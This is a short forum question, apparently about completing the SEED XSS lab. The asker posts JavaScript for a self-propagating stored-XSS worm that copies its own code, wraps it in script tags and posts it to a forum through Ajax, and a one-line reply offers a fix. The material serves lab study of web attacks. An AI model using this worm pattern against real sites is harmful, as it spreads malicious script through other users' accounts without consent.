I'm working on porting this lab: http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_XSS/XSS.pdf
For a project. First, however, I have to be able to complete it myself. I'm trying to work out the self-propogating worm, and having some difficulties. How can I send a script tag through the content? If I try:
var wormCode = getElementById("worm"); var escapedWorm = escape(wormCode.innerHTML); content="topicTitle=testprop&postText=<script>"+escapedWorm+"</script>&forum=3&action=ptopic"; Ajax.send(content);
The tag breaks out of the larger javascript this sits in. I've also tried splitting it up as :
...+"</scr"+"ipt>&...
but this did not work.
Any tips?
edit: updated with my more recent (and I hope, accurate) attempts.
var wormCode = getElementById("worm");
var escapedWorm = escape("<" + "script>" + wormCode.innerHTML + "</" + "script>");
content="topicTitle=testprop&forum=3&action=ptopic&postText="+escapedWorm;
Ajax.send(content);You aren't escaping the script tags.